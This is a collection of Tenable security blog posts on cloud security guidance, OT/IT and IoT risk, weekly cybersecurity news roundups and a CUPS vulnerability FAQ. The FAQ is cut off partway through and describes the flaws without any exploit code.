This document also has some additional links for guidance on the zero trust security model and network infrastructure security in general. The zero trust model fits well into a public cloud or hybrid cloud architecture considering the nature of what most organizations wish to do in those environments.

The guidance given in this document can be found scattered across all of the CIS Foundations benchmarks as well, such as recommending TLS access using version 1.2 or higher, denying specific traffic for security groups, and setting an explicit default deny firewall policy. There are also sections on networking specifically in each benchmark that address firewall rules for the respective CSP. Some examples of CIS recommendations to cover these topics includes:

Secure Data in the Cloud

The cloud storage document briefly covers the commonly available types of cloud storage: file/folder (smb/nfs/etc), object (like AWS Simple Storage Service [S3]), and block (mostly used by compute resources or other services provided by the CSP). Again, a common theme here is encryption and access control. Both encryption in transit and at rest are mentioned, with recommendations for TLS 1.2 or higher on data in transit and using a KMS for data at rest. And again, access controls using RBAC or ABAC are highlighted.

Considering this is data storage, an extra layer of security with data access is also recommended: some form of data loss prevention (DLP). DLP systems are often found employed in on-premises data centers. It is common practice to use DLP systems for healthcare, even though they’re not necessarily required for compliance with the Health Insurance Portability and Accountability Act (HIPAA). Other industries with heavy use of personal health information (PHI) and personally identifiable information (/PII) also make use of DLP systems. Auditing for exposure is an important part of DLP functionality, and since most of the larger and well-known cloud computing breaches were related in some way to cloud data storage configuration, this extra layer is very important.

As with recommendations in the other documents, many of the elements here are also included in CIS benchmarks, specifically calling out encryption at rest and in transit as well as proper access controls on storage accounts. In fact, for S3 buckets in AWS, the general recommendation in the CIS Amazon Web Services Foundations Benchmark is to enable the block public access functionality. To read more on this, see the AWS documentation. The recommendation below lines up with this specifically:

For additional Azure and Google Cloud Platform examples with regards to data encryption and security, see the recommendations below:

Mitigate Risks from Managed Service Providers in Cloud Environments

And finally, since organizations can sometimes struggle with something different than what they’re used to with on-premises data centers, some hire external contractors or managed service providers to help with the transition and continual administration of cloud environments. This document highlights the importance of the threat vector with outside parties getting involved in an organization’s cloud presence. MITRE even documents the Trusted Relationship as being a technique used by malicious actors to gain access with the purpose of establishing administrative control to a particular tenant environment.

In addition to an abundance of caution, there are auditing and access control measures that can go a long way to mitigating some of the risks associated with third-party involvement. While measures like MFA can help in most cases, access controls and monitoring are more effective when a third party is involved in deployments or administrative tasks. The topic then comes full circle, back to having appropriate IAM policies in place to protect the environment and the end users consuming the cloud services.

How Tenable can help

The summaries above are intended to give busy security professionals a quick and useful resource for understanding key points in each CISA/NSA document, as well as how they relate to existing CIS benchmarks. However, it would definitely be worthwhile for security professionals to review the documents carefully when deciding on steps to setup or secure a cloud environment, whether it’s for production use or simply as a testing ground. Most of the content hits on topics that have taken the forefront in cloud security, as well as security in general, in recent years. Securing access to data storage, isolation of workloads and encryption are all concepts that an entry level security engineer should be able to run with, whether they work in a data center or for a cloud-first organization. But, sometimes, there’s more work that needs to be done to find the gaps or misconfigurations.

Tenable Cloud Security and Nessus both include CIS benchmark content as a part of their offerings. Scanning with these products can help identify areas where a cloud environment could be improved upon in line with some of the recommendations provided in these documents. In addition, Tenable Cloud Security has many policies that can be used to scan for misconfigured IAM and our product leads have released numerous blogs around IAM over the years.

Learn more
Zan Liffick

Managing OT and IT Risk: What Cybersecurity Leaders Need to Know

Tenable Blog
1 month 2 weeks ago

Security leaders face the challenge of managing a vast, interconnected attack surface, where traditional approaches to managing cyber risk are no longer sufficient. Modern threats exploit vulnerabilities across domains, requiring a more holistic approach to avoid operational disruption, safety risks and financial losses.

In today’s rapidly evolving digital landscape, security leaders face an unprecedented challenge: managing and mitigating risks across both IT and operational technology (OT) environments. What was once a relatively straightforward task of defending a defined network perimeter has transformed into a complex battle to secure a vast, interconnected web of IT, OT and internet of things (IoT) systems where the lines between each are increasingly blurred. While integrating these systems reduces operational costs and drives efficiency, it also expands the attack surface, leaving organizations vulnerable to cyberthreats. A recent report by ESG showed that 76% of organizations have suffered a cyberattack as a result of an unknown, unmanaged or poorly managed internet-facing asset.

In other words, the attack surface has never been wider — or more difficult to protect.

The convergence of IT and OT has fundamentally shifted the role of security leaders. No longer confined to safeguarding traditional IT environments, cybersecurity leaders are finding themselves responsible for securing OT systems, cloud infrastructures, mobile and IoT devices, smart technologies, advanced AI systems and even shadow IT assets. Every new connection introduces unique vulnerabilities that must be managed to avoid devastating consequences — from operational disruption to safety risks and financial losses from ransomware and compliance failures. This evolving responsibility makes comprehensive cybersecurity increasingly challenging.

Image source: “Blackbox to blueprint: The security leader’s guidebook to managing OT and IT risk,” Tenable, October 2024

Why you need to think differently about risk

Traditional approaches to managing risk are no longer sufficient. Securing an organization today requires more than basic network defenses and a myriad of siloed security tools that provide an incomplete picture of the attack surface. Today’s threats exploit vulnerabilities across IT, OT and IoT environments, and attackers can move laterally across these domains to maximize the impact of their efforts. An overlooked attack vector or misconfiguration in a single system can lead to operational disruptions, safety risks and significant financial impact. Adapting to the evolving threat landscape means changing how you think about risk in your converged environment.

“76% of organizations have suffered a cyberattack as a result of an unknown, unmanaged, or poorly managed internet-facing asset.”

— Enterprise Strategy Group (ESG), “Elevating Security with Risk-based Vulnerability Management,” June 2024

While OT systems were once isolated and presumed to be “air-gapped” and safe from cyberattacks, they are now often exposed to the internet (whether directly or through laptops, management applications and other IT systems). Legacy OT systems, designed for longevity and reliability, often lack modern cybersecurity controls and are particularly sensitive to disruptions. IoT devices, meanwhile, are frequently insecure by design, creating blind spots in security postures if not properly accounted for.

In the infamous 2017 NotPetya breach, attackers exploited a vulnerability in Ukrainian accounting software M.E.Doc to infiltrate IT systems worldwide, including those at Maersk, the world's largest shipping conglomerate. The malware spread rapidly by combining two potent tools: EternalBlue, which exploited a Windows vulnerability, and Mimikatz, which extracted user credentials to move laterally across networks. This allowed the malware to propagate even on systems that had been patched, infecting thousands of machines in minutes.

At Maersk, the attack initially crippled their IT infrastructure, including essential systems that managed global shipping logistics. As the malware spread unchecked, it impacted OT environments by locking out systems responsible for controlling port logistics, crane operations and container management. The lack of adequate network segmentation between Maersk's IT and OT systems allowed the malware to jump from IT to OT, causing widespread operational paralysis. For days, Maersk's terminals around the world were forced to revert to manual processes, disrupting global shipping routes and creating massive logistical bottlenecks.

Attacks like NotPetya underscore the urgent need for security leaders to adopt a more holistic and integrated approach to managing IT and OT risk. Modern cyberthreats can quickly traverse from the IT network over to OT environments, exploiting vulnerabilities and causing cascading damage. To prevent these attacks, unified security strategies are required that focus on OT-specific defenses and full visibility across both IT and OT environments.

So, what can security leaders do to meet this growing challenge?

Where to start: Future-proof strategies for managing OT and IT risk

Effectively managing the security of your IT, OT and IoT assets requires a tailored approach. Each asset type comes with unique challenges — ranging from traditional OT systems, such as programmable logic controllers (PLCs) and industrial controllers, to the rapidly expanding deployment of IoT devices and sensors. A one-size-fits-all approach can’t provide the level of visibility and control needed to safeguard such a diverse environment.

OT assets are typically highly specialized, designed for longevity and operate in controlled environments in which downtime is costly or dangerous. Traditional IT security tools like endpoint detection and response fall short in such sensitive environments. Ensuring OT systems are secured requires purpose-built solutions that don't disrupt critical processes.

Similarly, IoT devices introduce unique complexities. Many IoT assets are “insecure by design” and evade traditional discovery and assessment techniques. While IoT architectures may share characteristics with both IT and OT environments, they require a dedicated strategy to ensure they don't become blind spots in your security posture.

Download the white paper, Blackbox to blueprint: The security leader’s guidebook for managing OT and IT risk, to learn how to extend your IT vulnerability management program to confidently close the cyber exposure gaps that put your connected operations and cyber-physical systems at risk. In this guide, we explore the key challenges facing today’s security leaders and offer actionable strategies to help minimize risk, protect critical assets, and develop a future-proof security approach.

  • Considerations for securing hybrid environments: Dive into proven strategies for gaining visibility into OT and IT assets, even when legacy systems and proprietary protocols are involved.
  • Tips to prevent operational disruption: Learn why traditional IT security tools are not sufficient for OT environments and how purpose-built solutions can help ensure both security and operational continuity.
  • How to streamline compliance and reporting: Understand the unique compliance challenges of securing converged OT/IT environments and how to streamline and automate audit, reporting and regulatory compliance processes.

These strategies are designed to put OT cybersecurity and resilience at the core of your digital transformation efforts.

#CPS #OTSecurity #ICSSecurity #BMS #DigitalTransformation #CISO

Learn more
Team Tenable

Cybersecurity Snapshot: Many Employees Overshare Work Info with AI Tools, Report Finds, as ‘Cybersecurity Awareness Month’ Kicks Off

Tenable Blog
1 month 2 weeks ago

Check out the best practices cyber agencies are promoting during Cybersecurity Awareness Month, as a report warns that staffers are feeding confidential info to AI tools. Meanwhile, a study highlights how business decisions can derail OT security. Plus, get the latest on Active Directory security, CISO salary trends and ransomware attacks!

Dive into six things that are top of mind for the week ending Oct. 4.

1 - CISA to promote MFA, software updates, phishing protection during Cybersecurity Awareness Month

October has arrived, and with it Cybersecurity Awareness Month, now in its 21st year. This global effort aims to make people aware of cyberthreats and to share cybersecurity best practices.

In the U.S., the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance (NCA) are promoting their “Secure Our World” campaign. Specifically, they’re encouraging people to:

“Our focus is working with government and industry to raise cybersecurity awareness and help everyone, from individuals to businesses to all levels of government, stay safe online in our ever-connected world,” CISA Director Jen Easterly said in a statement.

As an official Champion of the CISA and NCA Cybersecurity Awareness Month effort, Tenable is committed to reducing risk, raising awareness and staying alert to the daily actions that help protect the world against cyberattacks.

 

 

Meanwhile, in the European Union, the EU Agency for Cybersecurity (ENISA) is focusing its awareness campaign on social engineering scams, such as phising and vishing.

“This threat category encompasses a wide range of activities that attackers deploy when attempting to gain access to either information or services through exploiting human error or behaviour,” reads an ENISA statement.

To get more details, check out:

2 - Cybersecurity Awareness Month report: AI oversharing is out of control

Almost 40% of employees have fed sensitive work information to artificial intelligence (AI) tools without their employers’ knowledge, which highlights why organizations must urgently adopt AI usage policies and offer AI security training.

That’s one of many eye-opening findings in “Oh, Behave! The Annual Cybersecurity Attitudes and Behaviors Report 2024-2025,” published by the NCA as part of Cybersecurity Awareness Month.

Organizations must understand that employees inevitably will use generative AI, the report says, because of the productivity boost it offers; and that employees need guidance to understand the risks of using this technology.

Have you ever shared sensitive work information without your employer’s knowledge?

(Source: “Oh, Behave! The Annual Cybersecurity Attitudes and Behaviors Report 2024-2025” study by the National Cybersecurity Alliance, September 2024)

For example, more than half of employees surveyed (52%) said they hadn’t received any training on safe usage of AI.

“AI is here. You need watertight AI governance, and you need it yesterday,” reads the report, now in its fourth year and based on a survey of about 7,000 people ages 18 and up from Australia, Canada, Germany, India, New Zealand, the U.K. and the U.S..

Other key findings from the 139-page report include:

  • 65% of respondents are concerned about AI-related cybercrime
  • 54% find it easy to stay secure online
  • 35% were victims of cybercrime, with phishing the most common attack, accounting for 44% of incidents
  • 56% lack access to cybersecurity training
  • 65% consistently use unique passwords

To get more details, check out:

3 - Boosting critical infrastructure’s OT cybersecurity

How do business decisions impact the cybersecurity of operational technology (OT) systems in critical infrastructure organizations? That’s the key question tackled by a new guide authored by the Australian Cyber Security Centre (ACSC) in collaboration with cyber agencies from multiple other countries.

TItled “Principles of operational technology cyber security,” the document starts from the premise that it’s often difficult to determine how business decisions affect OT cybersecurity. Why? OT is extensively integrated into critical infrastructure organizations’ complex tech environments.

 

 

The 14-page document, published this week, aims to help critical infrastructure organizations “make decisions for designing, implementing, and managing OT environments to ensure they are both safe and secure, as well as enable business continuity for critical services.”

Specifically, “Principles of operational technology cyber security” outlines these six key principles for creating and maintaining a secure OT environment in critical infrastructure organizations:

  • Safety is critical in physical environments because security breaches may result in life-threatening situations.
  • It’s crucial for critical infrastructure organizations to have a deep understanding of their business, including which systems are vital for providing services.
  • Because OT environments don’t change frequently, it’s paramount to protect data about system configurations.
  • OT networks should be segregated from all other networks, including the internet and IT networks.
  • It's key to protect the equipment and software supply chain of the OT environment.
  • The OT security staff should receive the appropriate tools and training they need.

To get more details, read:

For more information about OT security, check out these Tenable resources:

4 - How to defend Active Directory against cyberattacks

Looking to boost your Active Directory defenses? Check out a new guide that details common AD attack techniques and offers recommended mitigations.

Published by cyber agencies from the Five Eyes countries – Australia, Canada, New Zealand, the U.K. and the U.S. – the guide “Detecting and Mitigating Active Directory Compromises” highlights critical AD weaknesses, including “permissive” default settings; complex relationships and permissions; and support for legacy protocols.

It explains how to detect and defend against 17 popular AD compromises, such as:

  • Kerberoasting
  • Unconstrained delegation
  • Golden certificate
  • One-way domain trust bypass
  • Security identifier history compromise

“By implementing the recommendations in this guidance, organisations can significantly improve their Active Directory security, and therefore their overall network security, to prevent intrusions by malicious actors,” the 68-page document reads.

Overview of Kerberoasting

(Source: Australian Cyber Security Centre, September 2024)

For more information about securing Active Directory, check out these Tenable resources:

5 - Survey: CISO churn rate drops again, as compensation grows 6%-plus

Back in 2022, more than one-fifth of CISOs changed jobs. Today, the story looks very different, as job turnover rates for CISOs have dropped significantly. As a result, most salary increases are coming in the form of relatively modest merit raises.

That’s according to the “2024 CISO Compensation Benchmark Summary Report,” published this week by IANS Research and Artico Search, and based on a survey of 755 CISOs, most of them (91%) based in the U.S.

While 17% and 21% of surveyed CISOs went to work for a new company in 2021 and 2022, respectively, those job-change rates fell to 12% in 2023 and to 11% in the first half of this year.

With less turnover than in the past two to three years, the majority of CISOs (70%) have gotten annual merit-based raises – a an average salary increase of 5.6%, and an overall average compensation bump of 6.3%.

“People have asked about salary depression in the security function but we see no evidence of it,” Steve Martano, an IANS faculty member and Artico Search cyber practice partner, said in a blog post.

Naturally, the ways to significantly boost your compensation are to either switch to a higher-paying job, or to receive a counteroffer or retention incentive from your current employer. Surveyed CISOs who went either of those routes got an average compensation boost of 31%. However, they were in the minority.

For more information about CISO trends:

6 - Report: Ransomware attacks jump in August

Ransomware gangs turned up the heat in August, unleashing 14% percent more attacks than in July. The industrials sector was the hardest hit, receiving almost one-fourth of all attacks, another sign of ransomware groups' strong interest in attacking critical infrastructure organizations.

That’s according to the NCC Group’s “Monthly Threat Pulse: Review of August 2024” report, which found that ransomware attacks rose year-on-year as well – up 16% compared with August 2023.

“The increase in ransomware attack figures this month is demonstrative of the continuing volatility of the threat landscape,” Matt Hull, Head of Threat Intelligence at NCC Group, said in a statement.

RansomHub ranked as the most active ransomware group, accounting for 16% of all attacks observed in August. This ransomware gang increased its number of attacks by 67% compared with July.

Ransomware Attacks by Threat Actors

(Source: NCC Group’s “Monthly Threat Pulse: Review of August 2024” report)

Juan Perez

How to Unlock Advanced IoT Visibility for Cyber-Physical Systems

Tenable Blog
1 month 2 weeks ago

As the number of IoT devices deployed globally continues to rise, cyber-physical systems and business operations are exposed to greater risk. Improving asset visibility, monitoring and risk management are critical steps to preventing breaches.

As businesses continue to embrace digital transformation, the proliferation of internet of things (IoT) devices across industries has resulted in unprecedented operational benefits, from smart lighting and heating, ventilation and air conditioning (HVAC) controls to building management and smart grid systems. However, these innovations and the sheer number of IoT devices being deployed every day come with a critical challenge: securing an ever-expanding attack surface, especially for traditional operational technology (OT) and critical cyber-physical systems (CPS) that are exposed to new vulnerabilities and threat actors. 

Not only do IoT devices introduce more entry points for potential attackers, but many of these devices are often overlooked by traditional security efforts. IoT systems may share characteristics with both IT and OT, but they require a dedicated strategy to ensure they don't become blind spots in your security posture. 

The importance of unified visibility to secure an internet of sensors

With IoT devices embedded across operational and corporate environments, today’s security leaders struggle to track what’s connected to their networks. Securing IoT assets is especially difficult due to the diversity of these devices — whether it’s the function they serve, architecture types or the different ways they can be managed. 

Additionally, many of today's commonly deployed IoT devices are "insecure by design," carrying outdated software and vulnerable configurations. For example, IoT sensors in building facilities such as smart lighting, HVAC systems and security cameras aren’t always managed by IT security teams — they’re often under the purview of facilities management and operators or external vendors. 

Without a unified approach, many organizations struggle to gain visibility into these devices and their associated asset relationships and vulnerabilities. This lack of centralized management leads to a fragmented view of the attack surface, creating blind spots that threat actors can exploit. 

Common pitfalls in security for IoT devices

There are five common challenges to securing IoT devices:

Limited visibility: Many organizations lack an accurate asset inventory as well as an understanding of the IoT devices on their networks, making it difficult to assess risk.

Diverse management: IoT devices often fall under the management of non-IT teams, such as facilities or external contractors, further complicating efforts to create a unified security approach that covers everything from IT infrastructure to cyber-physical systems.

Fragmented architecture: IoT ecosystems can be loosely or tightly coupled, with different network segments for different functions, making monitoring and securing them more complex. Traditional approaches to scanning IoT devices at the asset level alone fall short of providing the necessary context and insight into relationships between assets and attack paths.

Passive communication: Some IoT devices only transmit data when needed, which means traditional passive monitoring tools may miss critical vulnerabilities until it’s too late. As a result, many organizations are left vulnerable, with security leaders wondering how to effectively manage the security of these devices.

Lack of standardization: There are no universal security compliance standards for IoT. This has led to inconsistent levels of protection for these devices. This also makes it harder for security teams to respond to increasing demands for reporting for audit, compliance and internal governance.

What security leaders can do to improve IoT security

To address the challenges outlined above, security leaders must focus on several key areas:

Comprehensive visibility: Knowing which IoT devices are connected to your network is the first step to understanding how a compromised IoT device could impact critical operations. This requires adopting a unified OT/IT security solution with the ability to automatically discover and categorize IoT assets, map attack paths and prioritize how teams respond to the most critical vulnerabilities. These capabilities are important for all types of IoT architectures, whether dealing with standalone systems, mesh networks or devices embedded as part of a larger industrial control system. Without this visibility, organizations risk leaving critical vulnerabilities undetected.

Unified risk management: Once visibility is established, security leaders need a way to assess the business-critical risks posed by each device. By relying on modern OT/IT security tools and technologies that normalize data and manage exposure across all types of devices — whether IoT, OT or IT — security teams are equipped with a comprehensive, unified risk model. Not all vulnerabilities are created equal, so prioritizing the devices that present the greatest threat to operations or safety should be a focus. With this holistic view of risk, organizations can make informed decisions on where to allocate resources for the greatest security impact.

Collaboration between teams: With IoT devices often managed by non-IT teams, security teams must establish a collaborative relationship with facilities, operations and third-party vendors. This ensures a cohesive and effective approach to securing OT and IT environments from vulnerabilities created by connected IoT devices.

Proactive monitoring: Relying solely on passive monitoring can leave gaps in coverage when trying to detect and monitor IoT devices. Organizations should instead rely on hybrid discovery capabilities to actively query IoT management applications or use remote APIs to gather data passively. This application-based approach identifies every connected device and continuously monitors for new ones, helping security teams bridge the visibility gap and get a complete picture of risk.

Compliance and reporting: Maintaining compliance with evolving security standards is critical, especially for security leaders responsible for securing cyber-physical systems that include a diverse mix of interconnected IT, OT and IoT assets. As regulations become more complex and audits demand greater transparency, security leaders face increasing pressure to meet compliance requirements without disrupting operations. By leveraging modern solutions that offer detailed executive reporting and actionable insights aligned with the latest security frameworks — including the EU's Network and Information Security Directive 2 (NIS2), the U.K.'s Cyber Assessment Framework (CAF) and Saudi Arabia's Operational Technology Cybersecurity Controls (OTCC) — organizations can streamline compliance and reporting processes, efficiently communicate standings to executives and other non-technical stakeholders, and automate manual tasks. This proactive approach helps transform compliance into a competitive advantage.

Image source: Tenable, October 2024

So, how to get started? Security leaders can begin by asking:

  • Do we have full visibility into the IoT devices on our network?
  • Are we prioritizing the vulnerabilities that could cause the most damage?
  • Do we have the right tools in place to monitor all types of IoT architectures?
  • Are we collaborating effectively across internal silos and vendors to secure all asset types?

These questions can guide the development of a more robust cybersecurity strategy. However, understanding what’s connected to your network is just the start — having the right tools to assess and mitigate risks is what will truly secure your IoT landscape.

A step forward: Advanced IoT visibility

Effectively managing the security of your IT, OT and IoT assets requires a tailored approach. Each asset type comes with its own challenges — ranging from legacy OT systems to the rapidly expanding deployment of IoT devices and sensors. A one-size-fits-all approach simply will not provide the level of visibility and control needed to safeguard such a diverse environment.

For organizations looking to tackle the challenges of IoT security, advanced solutions are available to help you automate IoT asset discovery, assess risk, and manage vulnerabilities in a unified way. Watch our latest webinar to learn more about how our advanced IoT visibility capabilities in Tenable OT Security, such as contextual IoT asset discovery and relationship mapping, can help accelerate your security strategy. This webinar explores the latest approaches to securing IoT environments and how Tenable solutions help security teams across industries manage risk and compliance.

Image Source: Tenable, October 2024

In a hyper-connected world, securing IoT isn’t just about protecting devices — it’s about safeguarding the entire connected enterprise. By focusing on the latest best practices for managing exposures — asset visibility, risk management and proactive monitoring — security leaders can stay ahead of threats and build a more resilient cybersecurity strategy.

#CPS #OTSecurity #ICSSecurity #SmartBuildings #DigitalTransformation #IoT #RiskManagement

Learn more

Join us for an expert discussion on how to unlock advanced IoT visibility to secure connected OT/IT environments

Discover how the latest release of Tenable OT Security redefines discovery and classification of IoT device relationships

Find actionable strategies for securing the modern attack surface in our security leader's guide to managing OT and IT risk

Explore how Tenable helps assess NIS2 risk‑based security measures from three key perspectives across the enterprise

Find out how Splunk and Tenable together deliver more robust OT/IT security

Learn how to get started with Tenable OT Security



 



 

Matthew Abreu

Cybersecurity Snapshot: NIST Program Probes AI Cyber and Privacy Risks, as U.S. Gov’t Tackles Automotive IoT Threat from Russia, China

Tenable Blog
1 month 3 weeks ago

A new NIST program will revise security frameworks like NIST’s CSF as AI risks intensify. Plus, the U.S. may ban cars with Russian and Chinese IoT components. Meanwhile, the CSA adds AI insights to its zero trust guide. And get the latest on cybersecurity budgets, SBOMs and the Ghost cybercrime platform!

Dive into six things that are top of mind for the week ending September 27.

1 - NIST unveils program for AI privacy and cybersecurity

How will AI advancements impact risks to cybersecurity and privacy? How should existing frameworks be adapted? What new resources will have to be developed?

These are some of the key questions the new Cybersecurity, Privacy, and AI Program from the National Institute of Standards and Technology (NIST) will seek to answer.

The program will focus both on “the cybersecurity and privacy of AI” and on “the use of AI for cybersecurity and privacy,” Katerina Megas, who leads the NIST Cybersecurity for the Internet of Things (IoT) Program, wrote in a blog.

“The program will coordinate with other NIST programs, federal agencies, and commercial entities as needed to ensure a holistic approach to addressing AI-related cybersecurity and privacy challenges and opportunities,” Megas wrote.

 

 

Part of the program is the creation of a “community profile” to adapt security frameworks, starting with the NIST Cybersecurity Framework (CSF), as AI technology – and its risks – quickly evolve.

For starters, the AI community profile will focus on:

  • Cybersecurity and privacy risks faced by organizations that use AI
  • Defenses against AI-enabled attacks 
  • Ways for organizations to use AI to boost their cyber defenses and privacy protections

To join the AI community profile effort, you can visit the project’s home page and enter your information.

For more information about AI and cybersecurity, check out these Tenable blogs:

2 - U.S. gov’t to ban cars with Russian, Chinese IoT components

Citing national security concerns, the U.S. Department of Commerce wants to ban digitally connected vehicles that have components made in Russia and China, a move that spotlights automotive IoT’s cyber risk potential.

Specifically, the proposed rule would impact vehicle-connectivity systems (VCS) and automated driving systems (ADS). VCS wares enable vehicles to exchange data with external systems via Bluetooth, cellular, satellite and Wi-Fi modules. Meanwhile, ADS equipment allows vehicles to operate without a driver.

“Commerce has determined that certain technologies used in connected vehicles from the PRC and Russia present particularly acute threats. These countries of concern could use critical technologies within our supply chains for surveillance and sabotage to undermine national security,” reads a White House statement issued this week.

 

 

For example, Russia and China could use connected cars to capture data about U.S. geographical areas, infrastructure and critical infrastructure facilities. They could also tamper with the operation of the vehicles.

VCS and ADS software made by manufacturers “with a sufficient nexus” to the Chinese and Russian governments would be banned starting with 2027 vehicle models. Meanwhile, VCS hardware would be prohibited starting with 2030 vehicle models.

For more information about automotive cybersecurity and protecting automotive IoT devices:

3 - CSA updates zero trust paper with AI insights

Need clarity on how artificial intelligence intersects with the zero trust security model? Check out the new version of the Cloud Security Alliance’s “Zero Trust Guiding Principles” paper, which has been updated throughout with references to AI.

At a high level, version 1.1 of the paper addresses how AI can help you adopt a Zero Trust framework, and it also explains how zero trust can help you secure your AI systems.

“AI can aid with the implementation of a Zero Trust initiative, and Zero Trust principles should be applied in securing the use of AI, including AI models and training data,” the paper reads.

The first version of “Zero Trust Guiding Principles,” published in mid-2023, barely touched on the confluence of AI and zero trust. Thus, this revision is worth checking out even for people who read version 1.0.

 

 

The main goal of the “Zero Trust Guiding Principles” paper is to clearly explain zero trust, a concept that, according to the paper, “is often misunderstood and overcomplicated.”

“When properly understood, Zero Trust philosophy and strategy are valuable tools that organizations can use to enhance security, increase resilience, and guide digital transformation,” the paper reads.

Eleven guiding principles are discussed in the paper, including:

  • Begin by determining your intended outcomes, which can be things like cutting costs, boosting your governance and compliance program and reducing IT complexity.
  • Breaches will happen, so focus on strengthening your resilience.
  • Be clear about the level of risk your organization can tolerate.
  • Start small and look for quick wins.
  • Monitor continuously.

For more information about the intersection of AI and zero trust:

4 - CISO survey: Security budgets up 8% over 2023

Cybersecurity budgets grew 8% on average in 2024, compared with last year, as cybersecurity’s slice of the overall IT budget increased to 13.2% – almost five percentage points higher than in 2020.

Those stats come from the “2024 Security Budget Benchmark Summary Report” by IANS Research and Artico Search, based on a survey of 750-plus CISOs in the U.S. and Canada.

The major drivers of budget increases were the occurrence of a security incident or breach; and a change in an organization’s risk tolerance. Each triggered an average cybersecurity-budget increase of 26% in 2024.

Other major triggers for cybersecurity budget increases were a company repositioning; regulatory requirements; and company growth. Any of these three led to an average budget bump of 17%.

(Source: “2024 Security Budget Benchmark Summary Report” by IANS Research and Artico Search, September 2024)

While the 8% average growth in cybersecurity budgets was higher than the 6% recorded in 2023, it’s smaller than the double-digit percentage increases reported in 2021 and 2022 – 16% and 17% respectively.

“During those years, many organizations were still in catch-up mode regarding their cybersecurity programs,” reads an IANS blog about the 2024 cybersecurity budgets report.

That budget “hypergrowth” period has ended, as many organizations have brought their cybersecurity spending up to appropriate levels. At these organizations, the cybersecurity function “is better understood due to increased collaboration among CISOs, the leadership team and the board of directors,” the blog reads.

Overall, about two thirds of respondents reported a budget increase in 2024, while a quarter of respondents said their budget stayed flat and 12% experienced a cut.

Meanwhile, as a percentage of revenue, security budgets grew from 0.50% to 0.69% compared with last year.

To get more details, check out:

For more information about cybersecurity budget trends:

5 - NCSC outlines SBOM basics

Not entirely clear about what a software bill of materials (SBOM) is and how it can help your organization better secure its software supply chain? A new article from the U.K. National Cyber Security Centre (NCSC) could help clear things up for you.

Titled “SBOMs and the importance of inventory,” the article explains why – in theory – an SBOM can offer valuable visibility into the components of a piece of software. It also points out that an SBOM’s efficacy will depend on a variety of factors, including:

  • Your organization’s software development processes and practices
  • Your staff’s experience
  • Your organization’s risk tolerance

In other words, an SBOM isn’t a silver bullet.

“The mere presence of an SBOM does not guarantee that a supply chain is secure, and is not the answer to resolving all your supply chain risks,” the article reads.

To get all the details, read the article: “SBOMs and the importance of inventory,

For more information about SBOMs:

VIDEOS

Leveraging SBOM Practices to Facilitate Risk Reduction (Carnegie Mellon University)

An SBOM Primer (The Linux Foundation)

6 - Int’l police operation dismantles Ghost criminal comms platform

Ghost, an encrypted communications platform built for cybercriminals about nine years ago, has been taken down.

That’s according to the Australian Federal Police (AFP), which led a multi-national law enforcement effort dubbed Operation Kraken that has netted at least 38 arrests.

Among those arrested is a 32-year old Australian man charged with the creation and management of Ghost, whose messages the AFP decrypted and read.

The man, the first Australian accused of masterminding and managing a global criminal platform, allegedly sold modified smartphones with a subscription to an encrypted network.

Ghost became popular among cybercriminals thanks to its sophisticated security offerings, including its use of three encryption standards and a self-destruct mechanism for messages.

“This allowed criminal networks to communicate securely, evade detection, counter forensic measures, and coordinate their illegal operations across borders,” reads an Europol statement.

 

 

About 50 Australians face serious charges for using Ghost to sell illicit drugs, launder money, order killings and threaten to commit acts of violence.

Related law-enforcement action took place in Canada, Italy, Ireland and Sweden.

Juan Perez

CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177: Frequently Asked Questions About Common UNIX Printing System (CUPS) Vulnerabilities

Tenable Blog
1 month 3 weeks ago

Frequently asked questions about multiple vulnerabilities in the Common UNIX Printing System (CUPS) that were disclosed as zero-days on September 26.

Update September 27: The blog has been updated to include information about in-the-wild exploitation attempts, information on detecting external assets using Tenable Attack Surface Management and the upcoming availability of a remote direct check plugin.         

View Change Log

Background

The Tenable Security Response Team (SRT) has compiled this blog to answer Frequently Asked Questions (FAQ) regarding a series of vulnerabilities in the Common UNIX Printing System (CUPS). We will update this blog as more information becomes available.

FAQ

What is CUPS?

Common UNIX Printing System (CUPS) is an open-source printing system for Linux and other UNIX-like operating systems. CUPS uses the IPP (Internet Printing Protocol) to allow for printing with local and network printers.

What are the vulnerabilities associated with the recent CUPS disclosure?

As of September 26, the following four CVE identifiers were assigned for vulnerabilities related to CUPS:

CVEDescriptionAffected ComponentCVSSv3*CVE-2024-47076libscupsfilters Improper Input Validation or Sanitization Vulnerabilitylibcupsfilters8.6CVE-2024-47175libppd Improper Input Validation or Sanitization Vulnerabilitylibppd8.6CVE-2024-47176cups-browsed Binding to an Unrestricted IP Address Vulnerabilitycups-browsed8.4CVE-2024-47177cups-filters Command Injection Vulnerabilitycups-filters9.1

*These CVSSv3 scores are current as of September 26..

What are CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177?

CVE-2024-47076 is a flaw in the libcupsfilters library in which IPP packets are not validated or sanitized. This provides the attacker the ability to send malicious data to the CUPS system.

CVE-2024-47175 affects the libppd library and is an input validation issue. IPP data is not properly validated or sanitized before being written to a temporary PostScript Printer Description (PPD) file. This can result in an attacker injecting malicious data into the PPD file.

CVE-2024-47176 was assigned to a bug affecting the cups-browsed library. According to the blog post from Simone Margaritelli, the package allows any packet from any source to be trusted on the IPP port (default 631). Because of this, an attacker could send a crafted packet that would trigger a Get-Printer-Attributes IPP request, which would then reach out to an attacker controller URL.

CVE-2024-47177 impacts the cups-filters library and could allow an attacker to execute arbitrary commands using “via the FoomaticRIPCommandLine PPD parameter.”

The combination of these vulnerabilities could result in an attacker crafting a fake printer, thereby allowing them to execute arbitrary code whenever a print job has been started by the impacted host.

How severe are these vulnerabilities?

While there has been a lot of attention given to these vulnerabilities prior to disclosure, based on what has been disclosed as of September 26, these flaws are not at the level of something like Log4Shell or Heartbleed. We encourage organizations not to panic about these flaws as most attackers continue to exploit known vulnerabilities in internet facing assets.

When were these vulnerabilities first disclosed?

On September 23, Simone Margaritelli posted on X (formerly Twitter) that he recently reported a critical severity, CVSSv3 9.9 unauthenticated remote code execution (RCE) vulnerability that affects “all GNU/Linux systems” to Canonical, Red Hat and others. According to Margaritelli, disclosure and coordination with multiple Linux vendors was not a smooth process. Over the next several days, Margaritelli provided additional details about the disclosure woes and several media outlets began publishing warnings over this critical vulnerability.

* Unauthenticated RCE vs all GNU/Linux systems (plus others) disclosed 3 weeks ago.
* Full disclosure happening in less than 2 weeks (as agreed with devs).
